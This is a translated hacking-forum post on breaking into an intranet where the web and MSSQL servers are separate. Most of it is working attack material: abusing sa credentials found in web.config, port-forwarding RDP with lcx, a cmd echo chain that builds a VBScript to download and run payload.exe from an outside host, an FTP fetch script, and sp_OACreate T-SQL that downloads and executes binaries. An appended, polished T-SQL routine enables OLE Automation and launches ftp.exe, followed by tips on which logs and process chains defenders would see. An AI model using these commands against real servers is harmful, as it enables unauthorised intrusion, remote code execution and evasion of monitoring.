Penetration ideas for MSSQL with separated web and database servers

Source: Internet
Author: User

This article is reproduced from: http://bbs.blackbap.org/thread-6203-1-2.html

1. The server is on an intranet with the web server and the database server separated; the sa account password for the database server was found in web.config, and a user was successfully added on it (192.168.0.206).
2. Both the web server (192.168.0.203) and the database server (192.168.0.206) run Symantec antivirus, so the lcx.exe port-forwarding tool cannot be uploaded and used.
3. Other forwarding tools I tested were either detected by the antivirus or unusable; the reDuh tool could only forward the current IP and was very slow, unbearably so 0.0.
4. An EXE generated with msfpayload was also detected; since the server is x64 and msfencode has no x64 encoder, the reverse connection did not succeed.

Idea 1: Disable the antivirus, then download the tools with the commands given below (not tested).
Idea 2: Use an MSF aspx reverse shell, then forward ports and pivot across the route (succeeded).

Normal approach: if there were no antivirus, upload lcx.exe directly to 192.168.0.203 and forward RDP on 192.168.0.206 with the following command (on your own host the matching listener is lcx.exe -listen 51 <local port>):
    C:\lcx.exe -slave <your public IP> 51 192.168.0.206 3389    // after seeing this, you should all know it 0.0

DOS commands (each line is executed one at a time; together they append a VBScript downloader to xxx.vbs line by line, which is then run with cscript xxx.vbs):

    echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
    echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
    echo Post.Open "GET", "http://bbs.blackbap.org/payload.exe", 0 >>xxx.vbs
    echo Post.Send() >>xxx.vbs
    echo Set Aget = CreateObject("ADODB.Stream") >>xxx.vbs
    echo Aget.Mode = 3 >>xxx.vbs
    echo Aget.Type = 1 >>xxx.vbs
    echo Aget.Open() >>xxx.vbs
    echo Aget.Write(Post.ResponseBody) >>xxx.vbs
    echo Aget.SaveToFile "C:\xxx.exe", 2 >>xxx.vbs
    echo Wscript.Sleep 1000 >>xxx.vbs
    echo Shell.Run("C:\xxx.exe") >>xxx.vbs

(All lines must append to the same file, xxx.vbs; Aget.Type = 1 is binary mode, SaveToFile's second argument 2 overwrites an existing file, and Wscript.Sleep needs a millisecond argument or the script errors out. If the VBScript ever contains cmd metacharacters such as &, |, < or >, they have to be escaped with ^ in the echo line.)

Alternatively, pull the tool over FTP with a command script (127.0.0.1 stands in for your FTP server's IP; Admin/Admin are the FTP username and password):

    echo open 127.0.0.1>c:\ftp.dat
    echo Admin>>c:\ftp.dat
    echo Admin>>c:\ftp.dat
    echo binary>>c:\ftp.dat
    echo get lcx.exe>>c:\ftp.dat
    echo bye>>c:\ftp.dat
    ftp -s:c:\ftp.dat

MSSQL commands (run as sa; sp_OACreate requires sysadmin and the 'Ole Automation Procedures' option to be enabled):

    DECLARE @js int
    EXEC sp_OACreate 'ScriptControl', @js out
    EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
    EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("GET", "Url", 0); x.send(); var s = new ActiveXObject("ADODB.Stream"); s.mode = 3; s.type = 1; s.open(); s.write(x.responseBody); s.savetofile("c:\\windows\\<saved exe name>.exe", 2); var r = new ActiveXObject("Wscript.Shell"); r.run("c:\\windows\\<saved exe name>.exe");'

(Replace "Url" and the two <saved exe name> placeholders. One caveat: the Microsoft Script Control, msscript.ocx, only ships as a 32-bit component, so this ProgID cannot be created inside a 64-bit SQL Server process such as the x64 server described above; the FileSystemObject route below does not have that limitation.)

    declare @o int, @f int, @ret int
    exec sp_OACreate 'Scripting.FileSystemObject', @o out
    exec sp_OAMethod @o, 'CreateTextFile', @f out, 'C:\1.bat', 1
    exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'open IP'
    exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'FTP account'
    exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'ftp password'
    exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'get lcx.exe'
    exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'bye'
    exec sp_OAMethod @f, 'Close'

(Fill in the IP, FTP account and password. Despite its .bat name the file is an ftp command script and is consumed with ftp -s:C:\1.bat; Close must be called or the last lines may not be flushed to disk.)
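The FileSystemObject/ftp route above, carried through end to end as an added example that is not from the original post: it checks the sysadmin role, enables OLE automation if it is off, tests the HRESULT of every sp_OA* call, closes the file, and then runs ftp.exe through WScript.Shell (the same object the post's downloader uses) so no xp_cmdshell is needed. The FTP server address 192.0.2.10, the credentials anon/anon and the script path C:\1.txt are placeholders, not values from the post.

```sql
-- Added example, not from the original post. Assumes a sysadmin connection
-- (the sa password from web.config); 192.0.2.10, anon/anon and C:\1.txt are
-- placeholders for your FTP server, its credentials and the script path.
SET NOCOUNT ON;

-- sp_OACreate and friends are sysadmin-only.
IF IS_SRVROLEMEMBER('sysadmin') <> 1
BEGIN
    RAISERROR('sp_OA* procedures require the sysadmin role.', 16, 1);
    RETURN;
END

-- sp_OACreate fails with error 15281 until 'Ole Automation Procedures' is on;
-- it is an advanced option, so 'show advanced options' has to be set first.
IF (SELECT CAST(value_in_use AS int) FROM sys.configurations
    WHERE name = 'Ole Automation Procedures') = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
    EXEC sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE;
END

DECLARE @fso int, @file int, @shell int, @hr int,
        @src varchar(255), @desc varchar(255);

-- Write the ftp command script with Scripting.FileSystemObject. Every call
-- returns an HRESULT; the post ignores them and never closes the file, so a
-- later ftp -s: can find it empty or still locked.
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fso OUT;
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @fso, 'CreateTextFile', @file OUT, 'C:\1.txt', 1;
IF @hr <> 0 GOTO fail;

EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, 'open 192.0.2.10';
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, 'anon';
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, 'anon';
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, 'binary';
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, 'get lcx.exe C:\lcx.exe';
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, 'bye';
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @file, 'Close';
IF @hr <> 0 GOTO fail;

-- Run ftp.exe against the script via WScript.Shell.Run. ftp.exe runs as the
-- SQL Server service account, which therefore needs outbound access to the
-- FTP server (TCP/21 plus the data connection) through any host firewall.
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUT;
IF @hr <> 0 GOTO fail;
EXEC @hr = sp_OAMethod @shell, 'Run', NULL, 'cmd.exe /c ftp.exe -s:C:\1.txt';
IF @hr <> 0 GOTO fail;

EXEC sp_OADestroy @shell;
EXEC sp_OADestroy @file;
EXEC sp_OADestroy @fso;
RETURN;

fail:
    -- With NULL as the object token, sp_OAGetErrorInfo reports the COM source
    -- and description of the most recent failed OLE Automation call.
    EXEC sp_OAGetErrorInfo NULL, @src OUT, @desc OUT;
    RAISERROR('OLE call failed: hr=0x%x source=%s description=%s', 16, 1, @hr, @src, @desc);
```

Two things worth knowing before running this on an engagement: flipping 'Ole Automation Procedures' with sp_configure writes a "Configuration option ... changed from 0 to 1" line to the SQL Server ERRORLOG, and the child ftp.exe/cmd.exe processes are spawned by sqlservr.exe, which is exactly the parent/child relationship that endpoint monitoring on the database server is likely to flag.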

